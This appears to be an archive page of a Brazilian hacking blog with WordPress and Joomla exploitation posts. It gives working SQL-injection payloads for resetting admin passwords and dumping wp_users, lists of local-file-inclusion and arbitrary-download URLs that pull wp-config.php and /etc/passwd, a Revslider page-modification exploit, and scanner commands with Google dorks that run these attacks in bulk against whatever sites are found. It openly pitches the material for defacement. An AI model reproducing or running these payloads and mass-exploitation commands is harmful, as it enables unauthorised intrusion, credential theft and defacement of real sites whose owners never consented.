Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador wordpress. Mostrar todas as postagens
Mostrando postagens com marcador wordpress. Mostrar todas as postagens

quinta-feira, 30 de julho de 2015

Resetando senha WORDPRESS/JOOMLA via SQL injection

[0x00] Introdução Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento  e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.


[0x00] Introdução

Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento  e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.

[0x01] Conceito Joomla

Não sei bem se podemos chamar de conceito porém esse termo se encaixa bem e se não me falha a memoria já vi um artigo similar em algum lugar só não me recordo o autor.

[0x01a] A Hash 
   A hash utilizada pelo Joomla é uma especie de MD5 que divide a senha em partes apos o : se o numero de caracteres for impar sera acrescentado um a mais na primeira md5.

[0x01b] Exemplo:
147c6577fd36d90147c4ee3a5a0cceaa:sWTeBV3KGXeCtb6ivBFXKBRhMIJE4O0 a parte em preto corresponde a 0X4 e a parte destacada em vermelho h4x

[0x02] Injeção 

É bem semelhante a uma injeção de SQL normal apenas mudamos as tabela e colunas que vão ser exploradas em um caso normal estaríamos atras de colunas responsável pelo armazenamento do nome de usuário e senha porém dessa vez buscaremos a tabela responsável pelos códigos de ativação e email.

[0x02b] Tabela alvo
 O alvo é _user o nome pode variar porem em 90% dos casos sempre possui _user e vamos pegar as colunas email e activation.
Pegaremos o email e o introduziremos em alvo.ru/index.php?option=com_user&view=reset apos isso é só colocar o código pego na coluna activation e será possível escolher uma nova senha.

[0x03] Conceito Wordpress

Não muda muita coisa da injeção em joomla apenas possui um tipo de hash ate o momento "desconhecida" 

[0x03a] Tabela alvo e colunas
                 a tabela alvo é wp_users e as colunas são user_login user_activation_key.

[0x03b] Resetando 
    é bem semelhante ao joomla apenas muda o caminho por trata se de CMS diferentes primeiro entraremos em alvo.ru/wp-login.php?action=lostpassword e colocaremos o usuário que desejamos mudar a senha usuário obtido na user_login apos isso entraremos em /wp-login.php?action=rp&key=l33ts&login=h4x0r.

[0x04] Explicação Wordpress

Bom creio que todos tenham entendido a parte l33ts e h4x0r mas para os desatentos onde possui l33ts na url você introduz o código correspondente obtido em user_activation_key e onde localiza se H4x0r é o usuário obtido em user_login.

Solução ?
Mantenha seu CMS sempre atualizado e informe-se sobre 
novas falhas .

quarta-feira, 24 de junho de 2015

WordPress RobotCPA Plugin V5 - Local File Inclusion - MASS EXPLOIT INURLBR

Exploring theme Plugin RobotCPA V5 CMS wordpress

Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include Exploit Author: T3N38R15 Vendor Homepage: http://robot-cpa.good-info.co/ Version: 5V Tested on: Windows (Firefox) / Linux (Firefox) Acess: https://www.exploit-db.com/exploits/37252/  The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion. We just need to base64 encode our injection.

Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
Exploit Author: T3N38R15
Vendor Homepage: http://robot-cpa.good-info.co/
Version: 5V
Tested on: Windows (Firefox) / Linux (Firefox)
Acess: https://www.exploit-db.com/exploits/37252/


The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.

POC:

string exploit:
php://filter/resource=./../../../wp-config.php
base64: cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==

string exploit: 
file:///etc/passwd
base64: 
ZmlsZTovLy9ldGMvcGFzc3dk

Exemple Injetion:
http://domain.com/wp-content/plugins/robotcpa/f.php?l={STRING_BASE64_XPL}

Mass exploitation with inurlbr
using get exploration parameters and scanner internal encoder

Exemple:
--exploit-get {you_get}
--exploit-get  "&index.php?id=10'´0x27"


base64 Encrypt values in base64.
     Example: base64({value})
     Usage:   base64(102030)
     Usage:   --exploit-get 'user?id=base64(102030)'

Let's use:
--exploit-get "&l=base64(file:///etc/passwd)"
or
--exploit-get "&l=base64(php://filter/resource=./../../../wp-config.php)"

Dork:
inurl:"/wp-content/plugins/robotcpa/"
inurl:"plugins/robotcpa/f.php?l="

Complete command
php inurlbr.php --dork 'inurl:"plugins/robotcpa/f.php?l="' --exploit-get "&l=base64(file:///etc/passwd)" -s vuln.txt -q 1,2,3,64

Internal validation script inurlbr

Exploring the server password file...

LOCAL FILE INCLUSION
Local File Inclusion (also known as LFI) is the process of including  files, that are already locally present on the server, through the  exploiting of vulnerable inclusion procedures implemented in the  application. 
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
$validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
$validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
$validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
Finding any of these values the script alert as vulnerable.
Exploring the server wp-config.php file...

CMS WORDPRESS
As the name suggests, if the web application doesn’t check the file name required by the user, any malicious user can exploit this vulnerability to download sensitive files from the server.
Arbitrary File Download vulnerability file wp-config.php
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure
$validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
$validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
$validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
$validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
Finding any of these values the script alert as vulnerable.

OUTPUT: 

Download:
http://github.com/googleinurl/SCANNER-INURLBR

terça-feira, 9 de junho de 2015

WordPress Plugin 'WP Mobile Edition' LFI Vulnerability

Exploring wordpress plugin LFI using inurlbr in subprocess

Exploring wordpress plugin LFI using inurlbr in subprocess

Inurlbr Team
[+]=========== Assume NO ============[+]
 Liability and are not responsible
for any misuse or damage caused
 by this program!!
[+]==================================[+]

USAGE:

Make a file named payload .txt and put inside:
/wp-content/themes/mTheme-Unus/css/css.p­hp?files=../../../../wp-config.php

OTHER FAILURES(XPL's):

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
/wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
/wp-content/themes/felis/download.php?file=../wp-config.php
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/epic/includes/download.php?file=wp-config.php
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/lote27/download.php?download=../../../wp-config.php
/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php


EXPLOIT COMMAND:
php inurlbr.php --dork 'inurl:?fdx_switcher=mobile' -q [your favorite engines] -s scan.txt --get-file 'payload.txt' --sub-get --unique

Vídeo:



SCANNER INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

REF:
https://www.exploit-db.com/exploits/37244/
http://blog.inurl.com.br/2015/04/conceito-de-subprocess-scanner-inurlbr.html

quinta-feira, 7 de maio de 2015

WordPress FBConnect SQL Injection Vulnerability + INURLBR VALIDATING HTML RETURN

[ + ] INURLBR 2.1
[ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN
[ + ] WORDPRESS:  Fbconnect
[ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1
[ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0
exec: fbconnect_action=myhome&fbuserid=1 + xpl

[ + ] INURLBR 2.1 [ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN [ + ] WORDPRESS:  Fbconnect [ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1 [ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0 exec: fbconnect_action=myhome&fbuserid=1 + xpl


  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # EA:            http://www.exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil

[ + ] SEARCH DORK
--dork 'inurl:"?fbconnect_action="' 
---------------------------------------------------------------------------

[ + OUTPUT VULN
-s sqli.txt  
---------------------------------------------------------------------------

[ + ID SEARCH ENGINES 1 = GOOGLE + CSE, 6 GOOGLE API
-q 1,6 
---------------------------------------------------------------------------

[ + EXPLOIT GET
--exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0'
---------------------------------------------------------------------------

[ + TYPE INTERNAL VALIDATION
-t 2 
---------------------------------------------------------------------------

[ + SEARCH FOR CUSTOM VALUE
-a 'xpl_success' 
---------------------------------------------------------------------------

[ + FILTER HOSTS URL / MOD UNIQUE = HOST+XPL_GET
--unique
---------------------------------------------------------------------------

[ + ] CONVERTED VALUE
0x78706c5f73756363657373 = hex(xpl_success)
---------------------------------------------------------------------------

- We pass the value (hexdecimal)-'0x78706c5f73756363657373' in our sql injection.

Se a string 'xpl_success' aparecer no retorno html do nosso alvo, Significa que foi explorado com sucesso.
If the string 'xpl_success' appears on the html return of our target, it means that was successfully exploited.


Resumindo eu passo um valor pré-definido na minha injeção sql em formato hexdecimal no select ,caso tal valor retorne no formato string significa que foi executado com sucesso.
No tutorial converti a string xpl_success para hexadecimal que fica 78706c5f73756363657373, injeto no server ele executa e prita pro cliente.
No script INURLBR o parâmetro -t level 2 é pra ser validado com uma busca personalizada dentro do alvo, quando quero achar uma determinada string por isso usamos o comando -a complementando, -t 2 anula a busca de outros erros SQLI  e vai focar somente em nossa string passada através -a 'sua_string'.



if(HTML == xpl_success){ OK }


[ + ] COMMAND:
php inurlbrpriv8.php  --dork 'inurl:"?fbconnect_action="' -s sqli.txt -q 1,6 --exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0' -t 2 -a 'xpl_success' --unique

[ + ] VÍDEO:


DOWNLOAD SCANNER: 
https://github.com/googleinurl/SCANNER-INURLBR


REF
http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html
http://www.1337day.com/exploit/15790

terça-feira, 21 de abril de 2015

WordPress NEX-Forms 3.0 SQL Injection Vulnerability

The "submit_nex_form" ajax function is affected from SQL Injection vulnerability

  [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  -----------------------------------------------------------------------------

# AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
# Email:        [email protected]
# Blog:          http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:    https://fb.com/InurlBrasil
# Pastebin     http://pastebin.com/u/Googleinurl
# GIT:           https://github.com/googleinurl
# PSS:           http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS:          http://google.com/+INURLBrasil

- Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
- Vulnerability discovered by: Claudio Viviani
  -----------------------------------------------------------------------------

- EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL Injection Vulnerability / INURL BRASIL
- VENTOR:       https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
- Dork Google:  inurl:nex-forms-express-wp-form-builder
- Dork Google:  index of nex-forms-express-wp-form-builde
- GET VULN:     nex_forms_Id=(id)
- $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])
  -----------------------------------------------------------------------------

- DBMS:        'MySQL'
- Exploit:       AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)
  -----------------------------------------------------------------------------

Info:  The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
POC: http://target/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit
  -----------------------------------------------------------------------------

- --help:
   -t : SET TARGET.
 -f : SET FILE TARGETS.
 -p : SET PROXY
  Execute:
  php wp3xplo1t.php -t target
  php wp3xplo1t.php -f targets.txt
  php wp3xplo1t.php -t target -p 'http://localhost:9090'
  -----------------------------------------------------------------------------

- EXPLOIT MASS USE SCANNER INURLBR
- COMMAND: 
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --command-all "php wp3xplo1t.php -t '_TARGET_'"

- DOWNLOAD INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR
  -----------------------------------------------------------------------------

- INFO:           http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/

[!] CODE XPL:
- Xpl script: https://github.com/googleinurl/WordPress-NEX-Forms-3.0-SQL-Injection-Vulnerability

OUTPUT PRINT: 


  OUTPUT PRINT:

OUTPUT SQLMAP: 
 [03:18:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
 [03:20:45] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
 [03:24:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [03:24:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [03:25:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
 [03:25:11] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
 GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
 ---
 Parameter: nex_forms_Id (GET)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: action=submit_nex_form&nex_forms_Id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
 ---
 [03:25:12] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux
 web application technology: PHP 5.4.3, Apache 2.2.3
 back-end DBMS: MySQL 5.0.12

quinta-feira, 9 de abril de 2015

CONCEITO DE SUB_PROCESS / SCANNER INURLBR 2.0

 SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

 Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

============================================================


[!] LISTA DE STRING'S QUE SERÁ EXECUTADA(concatenada) PRA CADA ALVO ENCONTRADO.

  1. ['LIST_XPL_NAME']: = listxpl_wordpress_afd.txt

Conteúdo arquivo - URL XPL Wordpress Vulnerability Arbitrary File Download:


  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /wp-content/force-download.php?file=../wp-config.php
  • /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
  • /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
  • /wp-content/themes/markant/download.php?file=../../wp-config.php
  • /wp-content/themes/yakimabait/download.php?file=./wp-config.php
  • /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
  • /wp-content/themes/felis/download.php?file=../wp-config.php
  • /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
  • /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/epic/includes/download.php?file=wp-config.php
  • /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php
  • /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
  • /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
  • /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
  • /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php

--------------------------------------------------------------------------------------

[!] CMS WORDPRESS VALIDATION / INURLBR 2.0
 Já possui tal validação por padrão padrão interno.

  • ['CMS-WORDPRESS-01'] = "define('DB_NAME'";
  • ['CMS-WORDPRESS-02'] = "define('DB_USER'";
  • ['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
  • ['CMS-WORDPRESS-04'] = "define('DB_HOST'";

--------------------------------------------------------------------------------------

 [!] Running subprocesses:
 
 --sub-file  Subprocess performs an injection 
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt
         
 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get
         
 --sub-post defines whether the strings coming from 
     --sub-file will be injected via POST.
     Usage:   --sub-get

[!] Descrição de comando usado:

  1. DEFINIR DORK:                       --dork 'DORK'
  2. DEFINIR ARQUIVO FONTE:  -s 'output.txt'
  3. DEFINIR DORK:                       --sub-file 'file_subprocess.txt'
  4. FLAG TIPO REQUEST:            --sub-get / FLAG
  5. FLAG FILTRO HOST:              --unique  / HOST ÚNICOS EM SEU RESULTADO


[!] COMMAND EXEC:
GO! GO! ~
php inurlbr.php --dork 'site:br "Index of /wp-content/plugins/revslider"' -s teste.txt --sub-file 'listxpl_wordpress_afd.txt' --sub-get --unique
--------------------------------------------------------------------------------------

CADA BARRINHA  QUE É DEMONSTRADA, É UM PROCESSO DE VALIDAÇÃO..
Dá mesma forma que usei uns (strings/urls)xpls Wordpress, pode ser usado de outros CMS's...
ou URL's padrões para tentar gerar erros SQLI no server, Ataques LFI dá mesma forma..

[!] VÍDEO DEMONSTRATIVO:

Baixar scanner INURLBR 2.0: 
https://github.com/googleinurl/SCANNER-INURLBR




[ Neither war between hackers, nor peace for the system. ]



terça-feira, 31 de março de 2015

Inurlbr dorking + Wordpress brute forcing

[ Inurlbr dorking + Wordpress brute forcing ]

[ Inurlbr dorking + Wordpress brute forcing ]

    Eae galera, esses dias eu estava pesquisando algumas falhas em wordpress, então tive uma ideia de montar um script que realiza-se um bruteforce em wordpress's, Só que antes ele cata-se os sites com cms (Wordpress) e salva-se em um .txt.

    Pensei em fazer essa etapa de dorking na mão, mas pra quer ter esse trabalho todo quando se pode se utilizar o nosso scaner Inurlbr <3 com as dorks já definidas. Depois de catar as url na etapa de dorking com Inurlbr, Montei o script que verifica se aquela url trabalha ou não com Wordpress, caso não trabalhar ele te print na tela "Not is wordpress" caso contrario ele realizará o bruteforce com senhas padrões contidas dentro do código. No script tem poucas senhas mas você pode incrementar mas senhas ou se você tiver um pequeno conhecimento em python você pode colocar o script para carregar um wordlist.txt.

   A etapa de dorking você pode escolher em fazer manualmente ou deixar o script fazer por você, na execução ele ira te perguntar; Dorking use to find sites using the inurlbr? [Y][N].



[ COMMAND SCANNER INURLBR ]

  • ./inurlbr.php -q 1,6 --dork "[DORK]inurl:wp-content site:.com.br[DORK]inurl:wp-content/plugins/ site:.com.br" -s list.txt --comand-all "echo _TARGET_ >> list.txt"
  • Você pode adicionar mas dorks no comando do scanner, seperando elas com "[DORK]"

  [DEMO]






terça-feira, 24 de março de 2015

WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL

WORDPRESS EXPLOIT Revslider

Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress  é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css.

Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress  é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css. 

Enviando a requisição:
Via post com seguintes campos:
array(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
 "data" => "_YOU_HTML_ADD_"
 );

Dentro no campo data é onde enviamos nosso HTML modificado.
Nossa array post com os dados já previamente preechidos são enviados para seguinte
URL - POST: http://{target}/wp-admin/admin-ajax.php

Com todo processo terminado podemos verifica se foi modificado o HTML do alvo.
URL - FINAL:  http://{target}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css 

USANDO EXPLOIT : 
DOWNLOAD:  http://pastebin.com/a2LHiD7U

EXECUTE:
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
         php exploit.php -t target
         php exploit.php -f targets
         php exploit.php -t target -p 'http://localhost:9090'



OUTPUT COMAND -t:
OUTPUT: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL

OUTPUT COMAND -f targets.txt:
OUTPUT COMAND -f targets.txt:


Usando em massa com SCANNER INURLBR:
DOWNLOAD:
https://github.com/googleinurl/SCANNER-INURLBR 

COMANDO:
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'

OUTPUT:
OUTPUT: ./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'

quinta-feira, 12 de março de 2015

WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection / MINI EXPLOIT SQLMAP + SCANNER INURLBR

O WordPress SEO by Yoast plugin é usado por milhões de sites WordPress que querem ser encontrados na internet. O WordPress SEO by Yoast plugin é plugin gratuito voltado para otimização de sites para motores de busca, com intuito de aumentar seu ranking page em motores.

O WordPress SEO by Yoast plugin é usado por milhões de sites WordPress que querem ser encontrados na internet. O WordPress SEO by Yoast plugin é plugin gratuito voltado para otimização de sites para motores de busca, com intuito de aumentar seu ranking page em motores.

Descrição Técnica:

A vulnerabilidade de injeção blind SQL autenticado pode ser encontrado dentro do arquivo'admin/class-bulk-editor-list-table.php'. Os parâmetros GET order by e ordem não são suficientemente higienizado antes de serem usados dentro de uma consulta SQL.

Line 529:

$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title';

Line 533:

order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );


Proof of Concept (PoC):
O seguinte pedido GET fará com que a consulta SQL possa executar e dormir por 10 segundos, se clicou no como um administrador autenticado, editor ou usuário autor.

http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc


DORK: inurl:admin.php?page=wpseo_bulk

Desenvolvi um mini exploit para ser executado junto com SCANNER INURLBR ou separadamente via da sua preferencia usando sqlmap para tal exploração.
O scanner INURLBR fará toda busca e em seguida o mine exploit vai explorá-lo com sqlmap.

Otimização:
FULLhttp://pastebin.com/gi1Q4NmQ

EXECUTE MINI EXPLOIT: php mini_exploit.php www.target.com.br
COMANDO INURLBR:
./inurlbr.php --dork 'inurl:admin.php?page=wpseo_bulk' -s seo.txt -q 1,6 --comand-all "php mini_exploit.php _TARGET_" 

REF:
https://wpvulndb.com/vulnerabilities/7841
http://cyberwarzone.com/sql-vulnerability-in-wordpress-seo-by-yoast-patch-immediatly/

quinta-feira, 19 de fevereiro de 2015

Conheça o scanner CMSmap feito em python que verifica (WordPress, Joomla e Drupa)


CMSmap é um scanner de código aberto CMS python que automatiza o processo de detecção de falhas do CMSs mais popular de segurança. O principal objetivo do CMSmap é integrar as vulnerabilidades comuns para diferentes tipos de CMSs em uma única ferramenta.  No momento, CMSs apoiado por CMSmap são WordPress, Joomla e Drupal.  Por favor, note que este projeto é um estado inicial. Como tal, você pode encontrar erros, falhas ou mulfunctions. Use por sua conta e risco!  Installation diretamente GIT: git clone https://github.com/Dionach/CMSmap.git


CMSmap é um scanner de código aberto CMS python que automatiza o processo de detecção de falhas do CMSs mais popular de segurança. O principal objetivo do CMSmap é integrar as vulnerabilidades comuns para diferentes tipos de CMSs em uma única ferramenta.

No momento, CMSs apoiado por CMSmap são WordPress, Joomla e Drupal.

Por favor, note que este projeto é um estado inicial. Como tal, você pode encontrar erros, falhas ou mulfunctions. Use por sua conta e risco!

Installation diretamente GIT:
git clone https://github.com/Dionach/CMSmap.git


CMSmap tool v0.3 - Simple CMS Scanner
Author: Mike Manzotti [email protected]
Usage: cmsmap.py -t 
          -t, --target    target URL (e.g. 'https://abc.test.com:8080/')
          -v, --verbose   verbose mode (Default: false)
          -T, --threads   number of threads (Default: 5)
          -u, --usr       username or file 
          -p, --psw       password or file
          -i, --input     scan multiple targets listed in a given text file
          -o, --output    save output in a file
          -k, --crack     password hashes file
          -w, --wordlist  wordlist file (Default: rockyou.txt - WordPress only)       
          -a, --agent     set custom user-agent  
          -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules
          -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
          -F, --fullscan  full scan using large plugin lists. Slow! (Default: false)
          -h, --help      show this help   

Example: cmsmap.py -t https://example.com
         cmsmap.py -t https://example.com -f W -F
         cmsmap.py -t https://example.com -i targets.txt -o output.txt
         cmsmap.py -t https://example.com -u admin -p passwords.txt
         cmsmap.py -k hashes.txt


Uso de CMSmap para atacar alvos sem prévio consentimento mútuo é ilegal. É de responsabilidade do usuário final a obedecer todas as leis aplicáveis locais, estaduais e federais. Os desenvolvedores não assumimos nenhuma responsabilidade e não somos responsáveis por qualquer uso indevido ou danos causados por este programa.

segunda-feira, 19 de janeiro de 2015

wp-backup-plus: Wordpress Database File Download filter with inurlbr

Wordpress File Download Database 

The WP Backup Plus Plugin:
The Full Automated Wordpress Backup Plugin that sends your backup to multiple locations that allows you to backup, restore, automate, and clone.

DORK: index of "wp-backup-plus"

(Priv8) method for using the downloaded file to deface the server and how to find the script file download in WordPress sites can be explored in all wordpress versions.

[TUTORIAL]

Using inurlbr scanner to filter

COMMAND INURLBR:
php inurlbr.php --dork 'index of "wp-backup-plus"' -s save.txt -q 1,6 -t 2 -a '/wp-backup-plus'

[RESULT SHORT]
Using inurlbr scanner to explore  COMMAND INURLBR: inurlbr.php --dork 'index of "wp-backup-plus"' -s save.txt -q 1,6 -t 2 -a '/wp-backup-plus'

DOWNLOAD THE TOOL INURLBR: 
https://github.com/googleinurl/SCANNER-INURLBR

0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification

0days Theme  Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification


-------------------------------------------------------------------------------------------

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143

-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------

All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

Exploit developed can check about 20 themes, and allows check standard as follows.POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php

Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

